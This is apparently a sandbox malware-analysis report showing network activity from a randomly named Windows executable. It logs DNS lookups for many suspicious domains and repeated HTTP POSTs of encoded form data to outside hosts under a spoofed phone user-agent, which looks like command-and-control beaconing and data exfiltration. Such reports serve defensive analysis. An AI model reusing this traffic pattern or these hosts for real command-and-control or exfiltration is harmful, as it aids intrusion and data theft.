                      Sep 13, 2024 12:27:11.187170982 CEST1.1.1.1192.168.2.40x9108No error (0)www.route4.org34.150.58.73A (IP address)IN (0x0001)false
                      Sep 13, 2024 12:27:27.533168077 CEST1.1.1.1192.168.2.40x9841Name error (3)www.meery.storenonenoneA (IP address)IN (0x0001)false
                      Sep 13, 2024 12:27:35.691088915 CEST1.1.1.1192.168.2.40x6f02No error (0)www.subitoadomicilio.shop195.24.68.25A (IP address)IN (0x0001)false
                      Sep 13, 2024 12:27:49.651725054 CEST1.1.1.1192.168.2.40x4fc4No error (0)www.syvra.xyz162.0.213.94A (IP address)IN (0x0001)false
                      Sep 13, 2024 12:28:03.544994116 CEST1.1.1.1192.168.2.40x1e17No error (0)www.hm62t.tophm62t.topCNAME (Canonical name)IN (0x0001)false
                      Sep 13, 2024 12:28:03.544994116 CEST1.1.1.1192.168.2.40x1e17No error (0)hm62t.top154.23.184.240A (IP address)IN (0x0001)false
                      Sep 13, 2024 12:28:17.678682089 CEST1.1.1.1192.168.2.40x65b4No error (0)www.zhuoyueapp.top47.104.180.139A (IP address)IN (0x0001)false
                      Sep 13, 2024 12:28:31.529308081 CEST1.1.1.1192.168.2.40xb924Name error (3)www.pelus-pijama-pro.shopnonenoneA (IP address)IN (0x0001)false
                      Sep 13, 2024 12:28:39.616849899 CEST1.1.1.1192.168.2.40x5717No error (0)www.autonashville.comautonashville.comCNAME (Canonical name)IN (0x0001)false
                      Sep 13, 2024 12:28:39.616849899 CEST1.1.1.1192.168.2.40x5717No error (0)autonashville.com3.33.130.190A (IP address)IN (0x0001)false
                      Sep 13, 2024 12:28:39.616849899 CEST1.1.1.1192.168.2.40x5717No error (0)autonashville.com15.197.148.33A (IP address)IN (0x0001)false
                      Sep 13, 2024 12:28:52.807446003 CEST1.1.1.1192.168.2.40x5d1Name error (3)www.torkstallningar.shopnonenoneA (IP address)IN (0x0001)false
                      Sep 13, 2024 12:29:00.933579922 CEST1.1.1.1192.168.2.40x28bfNo error (0)www.dom-2.online199.59.243.226A (IP address)IN (0x0001)false
                      Sep 13, 2024 12:29:14.184401035 CEST1.1.1.1192.168.2.40x136No error (0)www.easyanalytics.siteeasyanalytics.siteCNAME (Canonical name)IN (0x0001)false
                      Sep 13, 2024 12:29:14.184401035 CEST1.1.1.1192.168.2.40x136No error (0)easyanalytics.site162.241.226.190A (IP address)IN (0x0001)false
                      Sep 13, 2024 12:29:29.049941063 CEST1.1.1.1192.168.2.40xabb0No error (0)www.kalomor.topkalomor.topCNAME (Canonical name)IN (0x0001)false
                      Sep 13, 2024 12:29:29.049941063 CEST1.1.1.1192.168.2.40xabb0No error (0)kalomor.top91.215.85.23A (IP address)IN (0x0001)false
                      Sep 13, 2024 12:29:29.049952984 CEST1.1.1.1192.168.2.40xabb0No error (0)www.kalomor.topkalomor.topCNAME (Canonical name)IN (0x0001)false
                      Sep 13, 2024 12:29:29.049952984 CEST1.1.1.1192.168.2.40xabb0No error (0)kalomor.top91.215.85.23A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • www.route4.org
                      • www.subitoadomicilio.shop
                      • www.syvra.xyz
                      • www.hm62t.top
                      • www.zhuoyueapp.top
                      • www.autonashville.com
                      • www.dom-2.online
                      • www.easyanalytics.site
                      • www.kalomor.top

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.45040134.150.58.73803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:27:11.216728926 CEST480OUTGET /65ev/?MtXH8dRH=dwwIBvsgoPduu1x03LiLu+lQGDFRz/zz5BoPsCvlGePibN32srUYcBSr/DN58z3DeItGY9KIy82Fautrr2SZe1nede/ReFPQiUe32Ik0HHEAi+oCxkmAYmk=&EB04T=0hSTF8phw HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.route4.org
                      Connection: close
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Sep 13, 2024 12:27:12.068170071 CEST1236INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 13 Sep 2024 10:27:11 GMT
                      Content-Type: text/html
                      Content-Length: 58288
                      Connection: close
                      Vary: Accept-Encoding
                      ETag: "6691ebc2-e3b0"
                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                      Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                      Sep 13, 2024 12:27:12.068217993 CEST1236INData Raw: 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62
                      Data Ascii: dy><div class="container"><div class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASUR
                      Sep 13, 2024 12:27:12.068249941 CEST1236INData Raw: 57 47 36 45 41 56 30 42 42 4f 51 37 78 46 39 4c 54 35 35 38 66 2b 69 52 48 56 59 6d 78 51 41 41 7a 32 46 47 7a 55 70 38 38 31 31 37 7a 44 64 70 54 4c 74 64 45 50 41 31 67 4a 4b 46 4e 46 66 6c 4d 58 54 35 43 59 56 56 42 4d 41 58 4f 43 68 6b 57 63
                      Data Ascii: WG6EAV0BBOQ7xF9LT558f+iRHVYmxQAAz2FGzUp88117zDdpTLtdEPA1gJKFNFflMXT5CYVVBMAXOChkWczTlx/Zse+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6w
                      Sep 13, 2024 12:27:12.068283081 CEST672INData Raw: 31 68 6b 32 50 54 62 58 6c 73 47 79 49 2b 4d 46 41 42 38 44 47 50 33 62 31 51 73 6a 62 71 65 6e 70 56 51 4e 4c 4e 45 6e 6e 30 6b 75 67 45 4f 4e 56 33 54 36 4e 4c 35 50 39 42 59 46 39 2f 7a 58 38 64 7a 79 6a 6b 32 49 61 42 4b 41 4e 73 69 33 38 36
                      Data Ascii: 1hk2PTbXlsGyI+MFAB8DGP3b1QsjbqenpVQNLNEnn0kugEONV3T6NL5P9BYF9/zX8dzyjk2IaBKANsi386rV0BEM9WoOwhoa224FgOksKjbDTnNHAdhMYGYM/jX9vFVbwOylS1VW0H0PDuCZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZ
                      Sep 13, 2024 12:27:12.068316936 CEST1236INData Raw: 4c 36 53 38 48 77 44 77 30 64 49 57 69 4b 77 4b 43 68 2f 78 31 67 4a 6f 43 59 31 71 39 34 6a 69 51 74 2f 6e 49 6e 4e 51 78 49 50 69 41 59 7a 42 70 30 70 41 53 53 39 59 37 54 6f 73 66 2f 43 4b 70 76 34 65 46 4f 4c 78 2f 69 37 6b 6c 37 50 2f 34 31
                      Data Ascii: L6S8HwDw0dIWiKwKCh/x1gJoCY1q94jiQt/nInNQxIPiAYzBp0pASS9Y7Tosf/CKpv4eFOLx/i7kl7P/41Uc+Rd1ngHQ8aoEpGRxCA60J/J2nc2IfSTOZ9mR8e8AeL+oixKyM1+9NbzD6g6rjoUKRBVEiZWWJCopMVaSMQQzhlIMqNrs245++9/b9q8MSK27uI2gUamfAXBQlNhdibFEkUn3LJKUZBXFu2qOSzp0eXc0dG0jbTT
                      Sep 13, 2024 12:27:12.068346024 CEST64INData Raw: 4d 42 2b 32 31 52 49 41 41 41 77 49 32 48 37 35 37 6b 71 32 49 48 34 37 72 4f 4a 4d 47 36 59 61 41 4d 74 6f 65 4b 73 33 6d 6c 61 73 64 49 35 41 4f 62 62 61 46 53 55 70 47 42 7a 4c 41 5a 67 74
                      Data Ascii: MB+21RIAAAwI2H757kq2IH47rOJMG6YaAMtoeKs3mlasdI5AObbaFSUpGBzLAZgt
                      Sep 13, 2024 12:27:12.069057941 CEST1236INData Raw: 68 79 57 68 6b 4b 72 52 48 70 7a 48 4b 59 65 31 2b 75 68 4d 6f 63 78 6e 52 64 5a 59 65 48 4a 68 4d 4d 46 6d 39 52 56 4b 46 69 57 57 43 5a 36 33 6d 62 34 44 78 71 77 34 63 66 57 4d 57 62 53 2b 7a 68 34 75 31 50 6b 49 48 4e 48 52 6c 32 74 4f 2b 42
                      Data Ascii: hyWhkKrRHpzHKYe1+uhMocxnRdZYeHJhMMFm9RVKFiWWCZ63mb4Dxqw4cfWMWbS+zh4u1PkIHNHRl2tO+Brdmk8FoGRtbAmLiv1Ogd0/mn4hkUYABiW2VsaarTwxeTr7LG4MGNtvw1QNtRDed/WODIGj07balBgrUzUoKBtygG9RiFBQjedJZOXJyUVVHbKJww6r5qI2vkEqre/Qps0GT44d/p7BqPckeOYhMTEbcrJxUeQwBjO
                      Sep 13, 2024 12:27:12.069089890 CEST1236INData Raw: 79 4a 70 69 56 51 43 6f 66 4c 57 71 33 77 62 57 71 31 4b 78 37 36 4b 74 46 2f 64 65 54 54 77 4b 58 38 30 64 4a 45 6f 62 77 66 41 47 4e 48 2b 46 37 79 6a 42 34 54 57 73 58 4b 74 35 30 37 6d 55 4f 2f 4e 4f 76 44 64 2f 31 37 32 73 74 44 47 42 47 74
                      Data Ascii: yJpiVQCofLWq3wbWq1Kx76KtF/deTTwKX80dJEobwfAGNH+F7yjB4TWsXKt507mUO/NOvDd/172stDGBGt3yz48bF044+FtUKa1PR564/AUpNQCaARgNYDuAGINRP9Ng1NsKgPxXwxizWU0l22zpuHvw2FxYxV1FGuWYLwV5qcoyhkKjpAk492rtCXPxetPxANkSDEwE8A6LMtrWbfoP0C9khglAXwBn7dkmZ5s+M16fUQ1Xkt5
                      Sep 13, 2024 12:27:12.069123030 CEST1236INData Raw: 2b 4f 6e 73 54 51 65 42 66 33 48 36 6b 38 47 6f 39 7a 55 59 39 52 38 67 62 79 6b 48 77 43 44 59 63 46 59 41 34 4b 39 56 7a 65 74 51 73 31 79 4c 74 78 5a 73 55 71 46 47 2b 62 31 51 71 32 52 6e 52 62 67 4a 4c 59 58 68 75 76 6c 74 38 42 51 4f 77 41
                      Data Ascii: +OnsTQeBf3H6k8Go9zUY9R8gbykHwCDYcFYA4K9VzetQs1yLtxZsUqFG+b1Qq2RnRbgJLYXhuvlt8BQOwAi5pJrDFCfSfQkB5kyLaWjM/G97H9se21Fi0jW5f1TCR635atXVE6smxq5cXtY7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeSaCsqaAMDdumWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXG
                      Sep 13, 2024 12:27:12.069155931 CEST672INData Raw: 67 49 72 6e 34 75 6e 46 39 33 4f 68 34 70 57 45 35 5a 78 6a 55 62 48 2f 32 41 30 6b 67 31 46 66 77 68 43 72 6e 77 44 43 66 73 6a 72 6e 62 62 7a 57 2f 4d 67 51 6c 61 51 6c 33 62 30 35 54 75 70 58 51 63 76 32 56 49 4a 4c 39 63 37 42 37 58 77 61 41
                      Data Ascii: gIrn4unF93Oh4pWE5ZxjUbH/2A0kg1FfwhCrnwDCfsjrnbbzW/MgQlaQl3b05TupXQcv2VIJL9c7B7XwaAAuhy9wIHM+vLj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/
                      Sep 13, 2024 12:27:12.073551893 CEST1236INData Raw: 58 77 4b 6f 72 76 51 36 41 74 4c 4b 2b 4f 67 2b 2b 6c 43 79 74 71 38 2b 2b 59 64 32 4b 4f 57 2f 74 38 69 48 4a 32 45 2f 47 71 75 36 30 38 42 51 41 77 68 76 35 54 74 7a 48 38 44 71 59 76 30 48 34 41 4b 48 39 56 61 39 38 43 54 49 6d 6b 31 2f 6b 6d
                      Data Ascii: XwKorvQ6AtLK+Og++lCytq8++Yd2KOW/t8iHJ2E/Gqu608BQAwhv5TtzH8DqYv0H4AKH9Va98CTImk1/kmu19Npw7qtJR/vH9LBKYlHJjTqtIEwJVAlxo/ZtOFPdv0QjNcd/6+Dt60BOA4g2xA5v6kT33YR4GQoUMe9n5XSp2ahxKkR2CAAgsfvsStp9qyRVzxt13n6jbrspNKzlMBBsJdkCYEXplj/xMMbmAcqKblgkqf+2K9O


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.450402195.24.68.25803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:27:35.725639105 CEST769OUTPOST /x7sd/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.subitoadomicilio.shop
                      Origin: http://www.subitoadomicilio.shop
                      Content-Length: 205
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.subitoadomicilio.shop/x7sd/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 38 7a 4b 2f 43 59 75 6c 4b 33 65 6c 4d 5a 67 2f 58 44 74 6d 4a 4b 63 36 36 66 44 66 53 69 69 42 72 65 66 4e 54 67 49 35 49 62 62 61 4b 62 69 51 66 76 5a 53 69 6a 36 6b 41 36 46 59 33 42 6b 30 57 34 54 76 32 6c 4f 6b 38 6d 64 44 42 30 4c 54 7a 32 65 4f 68 2f 48 6a 4b 4e 69 56 36 32 6c 52 47 44 72 6f 66 43 45 2f 65 4e 50 59 68 46 59 66 47 66 6b 43 43 43 47 50 46 37 4c 45 6b 35 6f 43 48 33 43 4e 79 37 36 5a 70 4f 64 34 4f 55 2f 39 39 73 4a 45 35 46 79 74 31 44 62 6d 7a 73 6f 45 79 6c 4a 73 56 76 58 50 4d 6c 53 48 73 37 64 64 32 61 59 31 35 70 48 54 31 58 67 58 68 72 2b 45 56 77 3d 3d
                      Data Ascii: MtXH8dRH=8zK/CYulK3elMZg/XDtmJKc66fDfSiiBrefNTgI5IbbaKbiQfvZSij6kA6FY3Bk0W4Tv2lOk8mdDB0LTz2eOh/HjKNiV62lRGDrofCE/eNPYhFYfGfkCCCGPF7LEk5oCH3CNy76ZpOd4OU/99sJE5Fyt1DbmzsoEylJsVvXPMlSHs7dd2aY15pHT1XgXhr+EVw==
                      Sep 13, 2024 12:27:36.406054020 CEST591INHTTP/1.1 404 Not Found
                      Server: openresty
                      Date: Fri, 13 Sep 2024 10:27:36 GMT
                      Content-Type: text/html; charset=iso-8859-1
                      Content-Length: 424
                      Connection: close
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 43 65 6e 74 4f 53 20 53 74 [TRUNCATED]
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.450403195.24.68.25803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:27:38.277626038 CEST789OUTPOST /x7sd/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.subitoadomicilio.shop
                      Origin: http://www.subitoadomicilio.shop
                      Content-Length: 225
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.subitoadomicilio.shop/x7sd/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 38 7a 4b 2f 43 59 75 6c 4b 33 65 6c 4e 36 49 2f 56 67 56 6d 4f 71 63 35 6d 76 44 66 5a 43 69 37 72 65 54 4e 54 6b 77 58 4c 75 4c 61 4b 37 53 51 65 72 4e 53 68 6a 36 6b 50 61 46 5a 71 78 6c 36 57 34 57 63 32 6e 61 6b 38 6d 35 44 42 31 62 54 7a 48 65 4e 6a 76 48 74 54 64 69 74 2b 32 6c 52 47 44 72 6f 66 47 73 56 65 4e 58 59 68 56 45 66 55 75 6b 46 4b 69 47 4f 41 4c 4c 45 67 35 6f 65 48 33 43 6a 79 36 6e 79 70 4d 31 34 4f 55 50 39 39 2b 78 48 33 46 79 76 71 7a 61 44 38 75 45 50 2f 31 64 6a 4b 73 54 47 47 6c 4b 72 70 39 4d 48 6e 72 35 69 72 70 6a 67 6f 51 70 6a 73 6f 44 4e 4f 34 54 71 69 32 62 45 4e 64 4b 43 47 58 56 38 4f 4e 57 48 41 68 38 3d
                      Data Ascii: MtXH8dRH=8zK/CYulK3elN6I/VgVmOqc5mvDfZCi7reTNTkwXLuLaK7SQerNShj6kPaFZqxl6W4Wc2nak8m5DB1bTzHeNjvHtTdit+2lRGDrofGsVeNXYhVEfUukFKiGOALLEg5oeH3Cjy6nypM14OUP99+xH3FyvqzaD8uEP/1djKsTGGlKrp9MHnr5irpjgoQpjsoDNO4Tqi2bENdKCGXV8ONWHAh8=
                      Sep 13, 2024 12:27:38.981177092 CEST591INHTTP/1.1 404 Not Found
                      Server: openresty
                      Date: Fri, 13 Sep 2024 10:27:38 GMT
                      Content-Type: text/html; charset=iso-8859-1
                      Content-Length: 424
                      Connection: close
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 43 65 6e 74 4f 53 20 53 74 [TRUNCATED]
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.450404195.24.68.25803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:27:40.826318979 CEST10871OUTPOST /x7sd/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.subitoadomicilio.shop
                      Origin: http://www.subitoadomicilio.shop
                      Content-Length: 10305
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.subitoadomicilio.shop/x7sd/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 38 7a 4b 2f 43 59 75 6c 4b 33 65 6c 4e 36 49 2f 56 67 56 6d 4f 71 63 35 6d 76 44 66 5a 43 69 37 72 65 54 4e 54 6b 77 58 4c 75 44 61 4a 49 71 51 66 4d 78 53 67 6a 36 6b 52 71 46 63 71 78 6c 33 57 34 75 44 32 6e 57 53 38 6b 52 44 44 58 44 54 37 56 6d 4e 70 76 48 74 63 39 69 57 36 32 6c 45 47 44 37 73 66 43 41 56 65 4e 58 59 68 55 30 66 44 76 6b 46 48 43 47 50 46 37 4c 79 6b 35 6f 36 48 33 4b 56 79 36 53 4a 70 38 56 34 4f 77 72 39 2f 4c 6c 48 2f 46 79 70 72 7a 61 68 38 75 4a 58 2f 31 41 53 4b 76 50 2f 47 6e 57 72 6b 71 78 52 36 6f 68 75 2f 36 4f 7a 7a 41 63 48 72 61 62 59 44 36 62 4f 6a 6d 32 64 4f 50 32 70 4b 51 38 45 62 4d 43 78 43 6c 4e 4d 6f 56 72 31 71 4d 66 4a 47 49 64 6f 6e 31 78 57 6a 6c 2b 78 64 75 45 4f 6e 4d 2b 62 6c 66 74 62 39 50 6f 69 2b 49 75 52 4b 5a 51 41 65 79 4b 50 38 69 44 2f 41 6a 47 31 42 6b 43 61 31 6b 6c 57 6e 35 51 36 6c 47 4e 33 6f 43 69 69 33 69 64 65 51 75 51 39 4f 53 49 38 73 55 6a 4b 57 33 38 53 57 53 50 39 6c 76 34 75 49 4c 66 2b 69 4b 4b 50 6f [TRUNCATED]
                      Data Ascii: MtXH8dRH=8zK/CYulK3elN6I/VgVmOqc5mvDfZCi7reTNTkwXLuDaJIqQfMxSgj6kRqFcqxl3W4uD2nWS8kRDDXDT7VmNpvHtc9iW62lEGD7sfCAVeNXYhU0fDvkFHCGPF7Lyk5o6H3KVy6SJp8V4Owr9/LlH/Fyprzah8uJX/1ASKvP/GnWrkqxR6ohu/6OzzAcHrabYD6bOjm2dOP2pKQ8EbMCxClNMoVr1qMfJGIdon1xWjl+xduEOnM+blftb9Poi+IuRKZQAeyKP8iD/AjG1BkCa1klWn5Q6lGN3oCii3ideQuQ9OSI8sUjKW38SWSP9lv4uILf+iKKPoH276fU3H1EFiMrkp5igrHlX83ab3TBNc9dQ+S+MNm1uuzkLDBoiOOPORzyQ1FVoQg9GUSSKC6ACns98Ea6i4JFuC9gT9KvAFMVuGTTYTIkRcb3RI0na8jPWRdNyHBRsrQJxiNNsBjtKQNftHq4nPmR9oXTgUHDndGlqkS5+cen21u22GII66Wf3lyIc9Osa1MXQsj9PgB6/jZo8/1v433gS3D8UcG7yDexsop8YBeeGaGIokykPPwP4H0MX/Eu6NN01+489WZGV3OORAhn+lCNw8sBvRyNHLVU4GylUjG5wAWz7ymgGE0bHFvD66qn3AUvDV7U6hOG0gAUzKkvQAaL5HeWu6gxJJY7+xq8v3lRvKWD/01egtUp33vWh5TtT4rGqY6Dy/1SoeLdjXsmf1SI4xD6gE9heHRqXZpbnmg7VgDgks+BqIe+9XkZxtH/+GZt1xRA8iaLmZKL54LjUr28KwCi0tvSk7Nh7XiLV9q6YJeS9tGMa2iVWpNaACGuzWgAZSPTVR7GpQkNfqrkfZ8SUmu8cDg/AstypCPhR4I3TUDXLBRruP9hDbxkvLMTnzAgZzJkpRf7Lcw8chWxuTTfqMR58Uf+6ZqKIpNcEbKeOeZoI3+wcGq4m/jP308AGn1+cT9XZN7cXnCctin7e20fGjaxyEX6vQIn [TRUNCATED]
                      Sep 13, 2024 12:27:41.509322882 CEST591INHTTP/1.1 404 Not Found
                      Server: openresty
                      Date: Fri, 13 Sep 2024 10:27:41 GMT
                      Content-Type: text/html; charset=iso-8859-1
                      Content-Length: 424
                      Connection: close
